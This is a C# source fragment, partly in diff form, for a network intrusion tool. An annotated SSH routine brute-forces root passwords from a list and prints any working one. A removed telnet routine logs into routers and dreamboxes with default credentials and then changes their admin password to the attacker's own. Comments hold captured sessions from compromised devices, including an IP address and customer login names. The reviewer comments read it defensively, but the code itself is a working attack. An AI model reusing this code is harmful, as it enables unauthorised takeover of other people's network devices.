/// outcome of each attempt. In the visible code the only call site is commented out.
///
/// Reviewer notes (defensive reading):
///  - Each entry is a separate connection and authentication attempt, so sshd auth
///    logs show a burst of failed root password logins from a single source.
///  - The loop does not stop after a successful login; it keeps trying the remaining
///    entries.
///  - A working password is written to the console in clear text.
///  - Disabling password authentication for root (key-only login) and rate-limiting
///    repeated failures both defeat this loop.
/// </summary>
/// <param name="myip">Host passed to SshStream as the connection target.</param>
public static void sshtry(string myip)
{
    Console.WriteLine("sshtry");
    // sshtry("test");
    foreach (string password in passwords)
    {
        try
        {
            Console.Write("-Connecting...");
            // The constructor connects and authenticates; a failure throws and is
            // handled in the catch block below.
            SshStream ssh = new SshStream(myip, "root", password);
            Console.WriteLine("{0} -> SSH PASSWORD IS: {1}\n", myip, password);
            Console.WriteLine("OK ({0}/{1})", ssh.Cipher, ssh.Mac);
            Console.WriteLine("Server version={0}, Client version={1}", ssh.ServerVersion, ssh.ClientVersion);
            Console.WriteLine("-Use the 'exit' command to disconnect.");
            Console.WriteLine();
            //Sets the end of response character
            ssh.Prompt = "#";
            //Remove terminal emulation characters
            ssh.RemoveTerminalEmulationCharacters = true;
            //Reads the initial response from the SSH stream
            // Console.Write(ssh.ReadResponse());
            ////Send commands from the user
            //while (true)
            //{
            // string command = Console.ReadLine();
            // if (command.ToLower().Equals("exit"))
            // break;
            // //Write command to the SSH stream
            // ssh.Write(command);
            // //Read response from the SSH stream
            // Console.Write(ssh.ReadResponse());
            //}
            // No command is sent in the live code; the session is closed right away.
            ssh.Close(); //Close the connection
            Console.WriteLine("Connection closed.");
        }
        catch (Exception e)
        {
            // Outcome is classified by comparing the exception message text: "Auth fail"
            // means a wrong password, anything else is reported as a generic SSH error.
            string response = string.Empty;
            response = e.Message;
            if (response == "Auth fail")
            {
                Console.Write("{0} -> bad ssh password: {1}\n", myip, password);
                // sshtry("12345");
            }
            else
            {
                // e.Message is concatenated into the format string, so braces in the
                // message are interpreted as format items.
                Console.WriteLine("{0} SSH ERROR -> "+e.Message,myip);
            }
        }
    }
}
- public static void telnettry(string myip, string banner)
- {
- Console.WriteLine("telnettry");
- Socket Sock_scan;
- byte[] data = new byte[1024];
- string stringdata="";
- int recv;
- //try
- //{
- IPAddress adresseIP = IPAddress.Parse(myip);
- IPEndPoint ip = new IPEndPoint(adresseIP, 23);
- // Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- //Sock_scan.Blocking = false; // This is a non blocking IO
- /*
- // Assign Callback function to read from Asyncronous Socket
- callbackProc = new AsyncCallback(ConnectCallback);
- // Begin Asyncronous Connection
- Sock_scan.BeginConnect(ip, callbackProc, Sock_scan);
- */
- // Sock_scan.Connect(ip);
- //recv = Sock_scan.Receive(data);
- //Console.WriteLine("{0} -> Banner telnet: " + Encoding.ASCII.GetString(data, 0, recv), myip);
- //}
- //catch (Exception eeeee)
- //{
- // Console.WriteLine(eeeee.Message);
- //}
- String strRetPage = null;
- Int32 bytes;
- Byte[] RecvBytes = new Byte[256];
- Encoding ASCII = Encoding.ASCII;
- /*
- bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- while (bytes > 0)
- {
- bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
- strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
- }
- Console.WriteLine("Banner telnet: " + strRetPage);
- */
- if (banner.Contains("ogin:") || banner.Contains("sername:"))
- {
- Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
- Sock_scan.Connect(ip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> BANNERLOGIN: " + stringdata, myip);
- #region BANNERS01
- //Exemple: Vulcan
- //<BAD SEQUENCE>
- //Copyright (c) 2001-2003 by Conexant, Inc.
- //login: 01
- //password:
- //Echec Login
- //login:
- //login: 02
- //password:
- //Echec Login
- //login: 03
- //password:
- //Echec Login
- //login:
- //login: 04
- //password:
- //Echec Login
- //login: 05
- //password:
- //Echec Login
- //Perte de la connexion à l'hôte.
- //</BAD SEQUENCE>
- //************************************************************************************
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- //LOGON PASSWORD>
- //(epicrouter)
- //
- //
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // MAIN MENU
- // 0. Select VC Adaptor
- // 1. Display Firmware Version
- // 2. Password Setup
- // 3. Connection Status
- // 4. Network Setup
- // 5. ADSL Setup
- // 6. System Maintenance
- // S. Save Settings and Reset Unit
- // R. Reset Without Saving Changes
- // Q. Quit Session
- // Enter your selection below:
- //>>>
- //(2)
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Password Setup
- // 1. Change Administrative Password
- // 2. Change PPP User Name and Password
- // 3. Change User Password
- // Press 'B' to go Back
- // Press 'M' to go to Main Menu
- // Enter your selection below
- //>>>
- //(1)
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Change Administrative Password
- // Enter New Admin Password:
- // (no less than 8 characters, '&' is not accepted)
- // (Press ESC to quit)
- //>>>
- //
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Confirm Administrative Password
- // Re-enter New Admin Password:
- // (no less than 8 characters, '&' is not accepted)
- // (Press ESC to quit)
- //>>>
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Password Setup
- // 1. Change Administrative Password
- // 2. Change PPP User Name and Password
- // 3. Change User Password
- // Press 'B' to go Back
- // Press 'M' to go to Main Menu
- // Enter your selection below
- //>>>
- // CONEXANT SYSTEMS, INC.
- // ACCESS RUNNER ADSL CONSOLE PORT 3.21
- // Quit Session
- // This will quit current telnet session.
- // Press 'Y' to continue, or 'B' to go back.
- // Press 'M' for main menu.
- //>>>
- //************************************************************************************
- //NetDVRDVS:admin
- //Password:
- //Login incorrect
- //************************************************************************************
- //User Access Verification
- //Username: admin
- //Password:
- //% Login invalid
- //************************************************************************************
- //(212.217.28.244)
- //User Access Verification
- //Password: 1234
- //GPBM>help
- //Help may be requested at any point in a command by entering
- //a question mark '?'. If nothing matches, the help list will
- //be empty and you must backup until entering a '?' shows the
- //available options.
- //Two styles of help are provided:
- //1. Full help is available when you are ready to enter a
- // command argument (e.g. 'show ?') and describes each possible
- // argument.
- //2. Partial help is provided when an abbreviated argument is entered
- // and you want to know what arguments match the input
- // (e.g. 'show pr?'.)
- //GPBM>
- //GPBM>?
- //Exec commands:
- // <1-99> Session number to resume
- // access-enable Create a temporary Access-List entry
- // access-profile Apply user-profile to interface
- // clear Reset functions
- // connect Open a terminal connection
- // disable Turn off privileged commands
- // disconnect Disconnect an existing network connection
- // enable Turn on privileged commands
- // exit Exit from the EXEC
- // help Description of the interactive help system
- // lock Lock the terminal
- // login Log in as a particular user
- // logout Exit from the EXEC
- // name-connection Name an existing network connection
- // pad Open a X.29 PAD connection
- // ping Send echo messages
- // ppp Start IETF Point-to-Point Protocol (PPP)
- // resume Resume an active network connection
- // rlogin Open an rlogin connection
- // set Set system parameter (not config)
- // show Show running system information
- // slip Start Serial-line IP (SLIP)
- // systat Display information about terminal lines
- // telnet Open a telnet connection
- // terminal Set terminal line parameters
- // traceroute Trace route to destination
- // tunnel Open a tunnel connection
- // where List active connections
- // x28 Become an X.28 PAD
- // x3 Set X.3 parameters on PAD
- //GPBM>
- //GPBM>ping 8.8.8.8
- //Type escape sequence to abort.
- //Sending 5, 100-byte ICMP Echos to 8.8.8.8, timeout is 2 seconds:
- //!!!!!
- //Success rate is 100 percent (5/5), round-trip min/avg/max = 44/45/48 ms
- //GPBM>
- //GPBM>show ?
- //backup Backup status
- //c1700 Show c1700 information
- //cca CCA information
- //cdapi CDAPI information
- //class-map Show QoS Class Map
- //clock Display the system clock
- //compress Show compression statistics
- //dialer Dialer parameters and statistics
- //exception exception informations
- //flash: display information about flash: file system
- //history Display the session command history
- //hosts IP domain-name, lookup style, nameservers, and host table
- //isdn ISDN information
- //location Display the system location
- //modemcap Show Modem Capabilities database
- //policy-map Show QoS Policy Map
- //ppp PPP parameters and statistics
- //queue Show queue contents
- //queueing Show queueing configuration
- //radius Shows radius information
- //rmon rmon statistics
- //rtr Response Time Reporter (RTR)
- //sessions Information about Telnet connections
- //snmp snmp statistics
- //tacacs Shows tacacs+ server statistics
- //template Template information
- //terminal Display terminal configuration parameters
- //traffic-shape traffic rate shaping configuration
- //users Display information about terminal lines
- //version System hardware and software status
- //GPBM>show version
- //Cisco Internetwork Operating System Software
- //IOS (tm) C1700 Software (C1700-Y-M), Version 12.1(1), RELEASE SOFTWARE (fc1)
- //Copyright (c) 1986-2000 by cisco Systems, Inc.
- //Compiled Tue 14-Mar-00 16:40 by cmong
- //Image text-base: 0x80008088, data-base: 0x805B7EE0
- //ROM: System Bootstrap, Version 12.0(3)T, RELEASE SOFTWARE (fc1)
- //GPBM uptime is 5 weeks, 6 days, 45 minutes
- //System returned to ROM by power-on
- //System image file is "flash:c1700-y-mz.121-1"
- //cisco 1720 (MPC860) processor (revision 0x501) with 12288K/4096K bytes of memory
- //.
- //Processor board ID JAD04180989 (362865562), with hardware revision 0000
- //M860 processor: part number 0, mask 32
- //Bridging software.
- //X.25 software, Version 3.0.0.
- //Basic Rate ISDN software, Version 1.1.
- //1 FastEthernet/IEEE 802.3 interface(s)
- //1 Serial(sync/async) network interface(s)
- //1 ISDN Basic Rate interface(s)
- //32K bytes of non-volatile configuration memory.
- //4096K bytes of processor board System flash (Read/Write)
- //Configuration register is 0x2102
- //GPBM>show diag
- //Slot 0:
- // C1720 1FE Mainboard Port adapter, 3 ports
- // Port adapter is analyzed
- // Port adapter insertion time unknown
- // EEPROM contents at hardware discovery:
- // Hardware Revision : 5.1
- // PCB Serial Number : JAD04180989
- // Part Number : 73-3201-05
- // Board Revision : 70
- // Fab Version : 04
- // EEPROM format version 4
- // EEPROM contents (hex):
- // 0x00: 04 FF 40 00 B2 41 05 01 C1 8B 4A 41 44 30 34 31
- // 0x10: 38 30 39 38 39 82 49 0C 81 05 42 37 30 02 04 FF
- // 0x20: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x30: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x40: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x50: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x60: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // 0x70: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
- // WIC Slot 0:
- // Serial 1T WAN daughter card
- // Hardware revision 1.0 Board revision H0
- // Serial number 0018074153 Part number 800-01514-01
- // Test history 0x00 RMA number 00-00-00
- // Connector type WAN Module
- // EEPROM format version 1
- // EEPROM contents (hex):
- // 0x20: 01 02 01 00 01 13 CA 29 50 05 EA 01 00 00 00 00
- // 0x30: 88 00 00 00 00 01 29 01 FF FF FF FF FF FF FF FF
- // WIC Slot 1:
- // BRI S/T - 2186 WAN daughter card
- // Hardware revision 1.3 Board revision A0
- // Serial number 0019915070 Part number 800-01833-03
- // Test history 0x00 RMA number 00-00-00
- // Connector type WAN Module
- // EEPROM format version 1
- // EEPROM contents (hex):
- // 0x20: 01 07 01 03 01 2F E1 3E 50 07 29 03 00 00 00 00
- // 0x30: 50 00 00 00 00 04 25 01 FF FF FF FF FF FF FF FF
- //************************************************************************************
- //-----------------------------------------------------------------------
- //Cisco Router and Security Device Manager (SDM) is installed on this device.
- //This feature requires the one-time use of the username "cisco"
- //with the password "cisco". The default username and password have a privilege le
- //vel of 15.
- //Please change these publicly known initial credentials using SDM or the IOS CLI.
- //Here are the Cisco IOS commands.
- //username <myuser> privilege 15 secret 0 <mypassword>
- //no username cisco
- //Replace <myuser> and <mypassword> with the username and password you want to use
- //.
- //For more information about SDM please follow the instructions in the QUICK START
- //GUIDE for your router or go to http://www.cisco.com/go/sdm
- //-----------------------------------------------------------------------
- //User Access Verification
- //Username: cisco
- //Password:
- //% Login invalid
- //************************************************************************************
- //BCM96338 ADSL Router
- //Login: bad
- //Password:
- //Login incorrect. Try again.
- //Login: admin
- //Password: password
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // Main Menu
- //1. ADSL Link State
- //2. LAN
- //3. WAN
- //4. DNS Server
- //5. Route Setup
- //6. NAT
- //7. Firewall
- //8. Quality Of Service
- //9. Management
- //10. Passwords
- //11. Diag
- //12. Reset to Default
- //13. Save and Reboot
- //14. Exit
- // ->
- //(10)
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // Password Menu
- //1. Admin
- //2. User
- //3. Support
- //4. Exit
- ///Passwords ->
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // Password Menu
- //1. Admin
- //2. User
- //3. Support
- //4. Exit
- ///Passwords -> 1
- // Password Configuration Menu For User admin
- //Note: Maximum length of password is 16 characters.
- //Old password :
- //New password :
- //Confirm new password:
- //Password for admin changed successfully.
- //Hit <enter> to continue
- //Note: If you have problem with Backspace key, please make sure you configure you
- //r terminal emulator settings. For instance, from HyperTerminal you would need to
- // use File->Properties->Setting->Back Space key sends.
- // DNS Menu
- //1. Configure
- //2. Show
- //3. Exit
- /// DNS Server -> 2
- //Automatic assigned IP address for DNS is enabled.
- //Primary DNS : 62.251.229.237
- //Secondary DNS: 62.251.229.223
- //Hit <enter> to continue
- //14. Exit
- // -> 14
- //Bye bye. Have a nice day!!!
- //Perte de la connexion à l'hôte.
- //************************************************************************************
- //Password: 1234
- // Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- // Prestige 650R-E1 Main Menu
- // Prestige 645 Main Menu
- //Getting Started Advanced Management
- // 1. General Setup 21. Filter Set Configuration
- // 3. LAN Setup 22. SNMP Configuration
- // 4. Internet Access Setup 23. System Password
- // 24. System Maintenance
- //Advanced Applications 25. IP Routing Policy Setup
- // 11. Remote Node Setup 26. Schedule Setup
- // 12. Static Routing Setup
- // 15. NAT Setup
- // 99. Exit
- // Enter Menu Selection Number:
- //(23)
- //
- // Menu 23 - System Password
- //Old Password= ?
- //New Password= ?
- //Retype to confirm= ?
- // Enter here to CONFIRM or ESC to CANCEL:
- //
- // Menu 4 - Internet Access Setup
- //ISP's Name= MyISP
- //Encapsulation= PPPoE
- //Multiplexing= LLC-based
- //VPI #= 8
- //VCI #= 35
- //ATM QoS Type= UBR
- // Peak Cell Rate (PCR)= 0
- // Sustain Cell Rate (SCR)= 0
- // Maximum Burst Size (MBS)= 0
- //My Login= saidi_im
- //My Password= ********
- //Idle Timeout (sec)= 0
- //IP Address Assignment= Dynamic
- // IP Address= N/A
- //Network Address Translation= SUA Only
- // Address Mapping Set= N/A
- //Press ENTER to Confirm or ESC to Cancel:
- //************************************************************************************
- //Password: 1234
- // Copyright (c) 1994 - 2004 ZyXEL Communications Corp.
- // Prestige 660HW-61 Main Menu
- //Getting Started Advanced Management
- // 1. General Setup 21. Filter Set Configuration
- // 2. WAN Backup Setup 22. SNMP Configuration
- // 3. LAN Setup 23. System Security
- // 4. Internet Access Setup 24. System Maintenance
- // 25. IP Routing Policy Setup
- //Advanced Applications 26. Schedule Setup
- // 11. Remote Node Setup
- // 12. Static Routing Setup
- // 14. Dial-in User Setup 99. Exit
- // 15. NAT Setup
- // Enter Menu Selection Number:
- //(23)
- //
- // Menu 23 - System Security
- //1. Change Password
- //2. RADIUS Server
- //4. IEEE802.1x
- //(1)
- //
- //Menu 23.1 - System Security - Change Password
- // Old Password= ?
- // New Password= ?
- // Retype to confirm= ?
- // Enter here to CONFIRM or ESC to CANCEL:
- // Enter Menu Selection Number:
- //************************************************************************************
- //(Cisco router)
- //User Access Verification
- //Username: bad
- //Password:
- //% Login invalid
- //Username: admin
- //Password:
- //% Login invalid
- //Username: admin
- //Password:
- //% Login invalid
- //Perte de la connexion à l'hôte.
- //************************************************************************************
- //**************************
- //* *
- //* The Gemini Project *
- //* *
- //**************************
- //welcome on your dreambox! - Kernel 2.6.9 (09:30:19).
- //dreambox login: root
- //Password:
- //BusyBox v1.01 (2007.08.23-20:51+0000) Built-in shell (ash)
- //Enter 'help' for a list of built-in commands.
- //root@dreambox:~>
- //root@dreambox:~> help
- //
- //Built-in commands:
- //-------------------
- // . : alias bg break cd chdir command continue eval exec exit export
- // false fg getopts hash help jobs kill let local pwd read readonly
- // return set shift times trap true type ulimit umask unalias unset
- // wait
- //root@dreambox:~> passwd
- //Changing password for root
- //Enter the new password (minimum of 5, maximum of 8 characters)
- //Please use a combination of upper and lower case letters and numbers.
- //Enter new password:
- //Re-enter new password:
- //Password changed.
- //root@dreambox:~>
- //root@dreambox:~>
- //\[ fusermount mkdir start-stop-daemon
- //ash gbox mknod streampes
- //automount gbox.ver mkswap streamripper
- //awk gdaemon mmi.socket streamsec
- //basename gdaemon.socket more streamts
- //boot grep mount stty
- //bunzip2 gunzip mv su
- //busybox gzip nc swapoff
- //bzcat halt netstat swapon
- //cat hdparm nslookup sync
- //chgrp head online.log syslogd
- //chmod hostname passwd tail
- //chown hotplug pid.info tar
- //chroot hotplug.socket pidof telnet
- //clear httpd ping telnetd
- //cp id pmt.tmp test
- //date ifconfig poweroff top
- //dd in.ftpd prockill touch
- //df in.telnetd ps true
- //dmesg inadyn pwd tty
- //dos2unix inetd rdate udhcpc
- //dropbear init reboot udpstreampes
- //dropbearkey insmod reset umount
- //dropbearmulti kill rm uname
- //du killall rmdir uniq
- //dvbnet klogd rmmod unix2dos
- //echo lcdoff route uptime
- //enigma lcdstuff sc.info usleep
- //enigmanet ln sc01.info vi
- //env loadkmap scp wc
- //eraseall logger sed wget
- //etherwake login sh which
- //expr logread showlogo whoami
- //false losetup sleep xargs
- //find ls smbmnt yes
- //flashtool lsmod smbmount zcat
- //free md5sum sort
- //************************************************************************************
- #endregion
- if (banner.Contains("dreambox"))
- {
- //dreambox login:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("root" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> BANNERPASSWORD01: " + stringdata, myip);
- //Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("dreambox" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
- }
- else
- { //Vulcan
- //login:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> BANNERPASSWORD: " + stringdata, myip);
- //password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01: " + stringdata, myip);
- }
- // cisco/cisco
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01a: " + stringdata, myip);
- //Login Successful
- //login:
- if(stringdata.Contains("ogin:"))
- {
- Console.WriteLine("{0} -> BAD LOGIN/PASSWORD", myip);
- }
- else
- {
- //$
- //$passwd
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("passwd" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01b: " + stringdata, myip);
- if (banner.Contains("Vulcan"))
- {
- //Enter Old Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("admin" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01c: " + stringdata, myip);
- }
- else
- {
- //On a pas cette ligne sur une BusyBox ou une dreambox
- }
- //Enter New Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01d: " + stringdata, myip);
- //Confirm New Password:
- Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("j3R0m3!!" + "\r"), SocketFlags.None);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01e: " + stringdata, myip);
- recv = Sock_scan.Receive(data);
- stringdata = Encoding.ASCII.GetString(data, 0, recv);
- Console.WriteLine("{0} -> Response telnet01f: " + stringdata, myip);
- //Login incorrect (dreambox)
- //Password changed
- //Set Done
- //SINON: Erreur: Combinaison nom utilisateur/mot de passe invalide
- //passwd: An error occurred updating the password file. //BusyBox
- }
- //login:
- Sock_scan.Close();
- }
- if (banner.Contains("assword:"))
- {
- #region BANNERS
- //********************************************************
- //Info:Connection was denied by remote host according to ACL!
- //********************************************************
- //Copyright (c) 2001 - 2006 TP-LINK TECHNOLOGIES CO., LTD
- //admin
- //Valid commands are:
- //sys exit ether wan
- //ip bridge dot1q pktqos
- //show set lan
- //********************************************************
- //Copyright (c) 2001 - 2006 TrendChip Technologies Corp.
- //1234
- //Valid commands are:
- //sys exit ether wan
- //etherdbg usb ip bridge
- //dot1q pktqos show set
- //lan
- //
- //tc> sys countrycode
- //country code = 253 //Djibouti
- //********************************************************
- // *******************
- // Welcome to Vulcan
- // *******************
- //Conexant Inc., Software Release 3.C10MTT0.8822A
- //Copyright (c) 2001-2003 by Conexant, Inc.
- //login:
- //admin
- //password:
- //admin
- //Login Successful
- //$
- //$help
- //Command Description
- //------- -----------
- //alias To Alias a command
- //apply Apply configuration/image file
- //commit Commit the active config to the flash
- //create Create a new entry of specified type
- //delete Delete the specified entry
- //download Download a file on to the Device
- //exit To exit the CLI shell
- //get Display info for the search
- //help Provides help
- //list List files
- //modify Modify information for specified entry
- //passwd To modify user password
- //ping The normal ping command
- //prompt Change the user prompt
- //reboot Reboot the device
- //remove Remove file
- //reset Reset info for the specified entry
- //size ATM Sizing Information
- //traceroute The normal traceroute command
- //trigger To set trigger
- //unalias To undefine previously defined alias
- //verbose Switch ON/OFF the verbose mode
- //********************************************************
- //Password: 1234
- //Copyright (c) 1994 - 2007 ZyXEL Communications Corp.
- //ras>
- //ras> help
- //Valid commands are:
- //sys exit ether wan
- //aux wlan ip ipsec
- //bridge certificates bm lan
- //vlan radius 8021x autoSec
- //ras> sys
- //packetscan adjtime callhist countrycode
- //date domainname edit extraphnum
- //feature firewall myZyxelCom hostname
- //logs stdio datetime time
- //tos trcdisp trclog trcpacket
- //version view wdog romreset
- //upnp atsh atmu ateb
- //xmodemmode diag save display
- //adminPassword userPassword default fwnotify
- //tripleplay general socket filter
- //ddns cpu winmes snmp
- //ras> sys adminPassword
- //Usage: adminPassword <new adminPassword>
- //ras> sys adminPassword j3R0m3!!
- /*
- Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- Prestige 650R-E1 Main Menu
- Getting Started Advanced Management
- 1. General Setup 21. Filter Set Configuration
- 3. LAN Setup 22. SNMP Configuration
- 4. Internet Access Setup 23. System Password
- 24. System Maintenance
- Advanced Applications 25. IP Routing Policy Setup
- 11. Remote Node Setup 26. Schedule Setup
- 12. Static Routing Setup
- 15. NAT Setup
- 99. Exit
- Enter Menu Selection Number:
- */
- /*
- Menu 1 - General Setup
- System Name= ?
- Location=
- Contact Person's Name=
- Domain Name=
- Edit Dynamic DNS= No
- Route IP= Yes
- Bridge= No
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 23 - System Password
- Old Password= ?
- New Password= ?
- Retype to confirm= ?
- Enter here to CONFIRM or ESC to CANCEL:
- */
- /*
- Menu 3 - LAN Setup
- 1. LAN Port Filter Setup
- 2. TCP/IP and DHCP Setup
- Enter Menu Selection Number:
- */
- /*
- Menu 3.1 - LAN Port Filter Setup
- Input Filter Sets:
- protocol filters=
- device filters=
- Output Filter Sets:
- protocol filters=
- device filters=
- */
- /*
- Menu 3.2 - TCP/IP and DHCP Setup
- DHCP Setup
- DHCP= Server
- Client IP Pool Starting Address= 192.168.1.33
- Size of Client IP Pool= 32
- Primary DNS Server= 0.0.0.0
- Secondary DNS Server= 0.0.0.0
- Remote DHCP Server= N/A
- TCP/IP Setup:
- IP Address= 192.168.1.1
- IP Subnet Mask= 255.255.255.0
- RIP Direction= Both
- Version= RIP-2B
- Multicast= None
- IP Policies=
- Edit IP Alias= No
- Press ENTER to Confirm or ESC to Cancel:
- Press Space Bar to Toggle.
- */
- /*
- Menu 4 - Internet Access Setup
- ISP's Name= MyISP
- Encapsulation= PPPoE
- Multiplexing= LLC-based
- VPI #= 8
- VCI #= 35
- ATM QoS Type= UBR
- Peak Cell Rate (PCR)= 0
- Sustain Cell Rate (SCR)= 0
- Maximum Burst Size (MBS)= 0
- My Login= zemzem2
- My Password= ********
- Idle Timeout (sec)= 0
- IP Address Assignment= Dynamic
- IP Address= N/A
- Network Address Translation= SUA Only
- Address Mapping Set= N/A
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 11 - Remote Node Setup
- 1. MyISP (ISP, SUA)
- 2. ________
- 3. ________
- 4. ________
- 5. ________
- 6. ________
- 7. ________
- 8. ________
- Enter Node # to Edit:
- */
- /*
- Menu 11.1 - Remote Node Profile
- Rem Node Name= MyISP Route= IP
- Active= Yes Bridge= No
- Encapsulation= PPPoE Edit IP/Bridge= No
- Multiplexing= LLC-based Edit ATM Options= No
- Service Name= zyxel
- Incoming: Telco Option:
- Rem Login= Allocated Budget(min)= 0
- Rem Password= ******** Period(hr)= 0
- Outgoing: Schedule Sets=
- My Login= zemzem2 Nailed-Up Connection= Yes
- My Password= ******** Session Options:
- Authen= CHAP/PAP Edit Filter Sets= No
- Idle Timeout(sec)= N/A
- Edit Traffic Redirect= No
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 21 - Filter Set Configuration
- Filter Filter
- Set # Comments Set # Comments
- ------ ----------------- ------ -----------------
- 1 _______________ 7 _______________
- 2 _______________ 8 _______________
- 3 _______________ 9 _______________
- 4 _______________ 10 _______________
- 5 _______________ 11 _______________
- 6 _______________ 12 _______________
- Enter Filter Set Number to Configure= 0
- Edit Comments= N/A
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 21.1 - Filter Rules Summary
- # A Type Filter Rules M m n
- - - ---- --------------------------------------------------------------- - - -
- 1 N
- 2 N
- 3 N
- 4 N
- 5 N
- 6 N
- Enter Filter Rule Number (1-6) to Configure:
- */
- /*
- Menu 21.1.1 - TCP/IP Filter Rule
- Filter #: 1,1
- Filter Type= TCP/IP Filter Rule
- Active= No
- IP Protocol= 0 IP Source Route= No
- Destination: IP Addr=
- IP Mask=
- Port #=
- Port # Comp= None
- Source: IP Addr=
- IP Mask=
- Port #=
- Port # Comp= None
- TCP Estab= N/A
- More= No Log= None
- Action Matched= Check Next Rule
- Action Not Matched= Check Next Rule
- Press ENTER to Confirm or ESC to Cancel:
- Press Space Bar to Toggle.
- */
- /*
- Menu 22 - SNMP Configuration
- SNMP:
- Get Community= public
- Set Community= public
- Trusted Host= 0.0.0.0
- Trap:
- Community= public
- Destination= 0.0.0.0
- Press ENTER to Confirm or ESC to Cancel:
- */
- /*
- Menu 24 - System Maintenance
- 1. System Status
- 2. System Information and Console Port Speed
- 3. Log and Trace
- 4. Diagnostic
- 5. Backup Configuration
- 6. Restore Configuration
- 7. Upload Firmware
- 8. Command Interpreter Mode
- 9. Call Control
- 10. Time and Date Setting
- 11. Remote Management
- Enter Menu Selection Number:
- */
- /*
- Enter Menu Selection Number: 8
- Copyright (c) 1994 - 2003 ZyXEL Communications Corp.
- ras> help
- Valid commands are:
- sys exit ether wan
- ip bridge
- ras>
- */
- /*
- Menu 24.11 - Remote Management Control
- TELNET Server:
- Server Port = 23 Server Access = ALL
- Secured Client IP = 0.0.0.0
- FTP Server:
- Server Port = 21 Server Access = ALL
- Secured Client IP = 0.0.0.0
- Web Server:
- Server Port = 80 Server Access = ALL
- Secured Client IP = 0.0.0.0
- Press ENTER to Confirm or ESC to Cancel:
- */
- //********************************************************
- //**************************
- //* *
- //* The Gemini Project *
- //* *
- //**************************
- //welcome on your dreambox! - Kernel 2.6.9 (17:51:55).
- //dreambox login: admin
- //Password:
- //Login incorrect
- //dreambox login:
- //
- //root/dreambox
- //********************************************************
- //***************************
- //* *
- //* The Gemini Project *
- //* *
- //***************************
- //* Prepared By "drhg" *
- //* ( Dream-Gaza Team ) *
- //* www.dreamgaza.com *
- //***************************
- //Checking Kernel, Please Wait ....
- //Kernel 2.6.9.
- //md5sum (dreambox Linux ppc ).
- //head.ko = 308509 bytes.
- //Safe, NO 'clone bomb' found ... Congratulations.
- //Enjoy Original Gemini Project without Time Bomb !.
- //---------------------------------------------------
- //(Friday, 17 September 2010).
